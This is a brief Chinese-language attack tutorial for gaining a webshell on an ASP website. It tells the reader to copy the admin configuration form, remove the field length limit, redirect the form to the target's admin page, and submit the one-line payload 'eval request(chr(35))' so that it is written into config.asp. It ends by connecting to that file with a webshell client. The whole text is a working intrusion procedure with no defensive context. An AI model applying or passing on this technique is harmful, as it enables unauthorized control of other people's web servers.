进入http://url/admin.asp?action=ShowConfig,查看原代码

查找<td><input name="RecordNum" type="text" id="RecordNum" value="100" size="40" maxlength="3"></td>

修改maxlength="3"为maxlength="50">

然后查找 <form name="form1" method="post" action="?Action=SaveConfig">处

修改为action="http://url/admin?Action=SaveConfig">

存为html文件打开后在最后详细来访信息记录多少条记录，默认为100条框输入100:eval request(chr(35))

此处没有哪个"的然后保存设置后提示成功后

用海洋eval连接http://url/config.asp文件就获得一个webshell！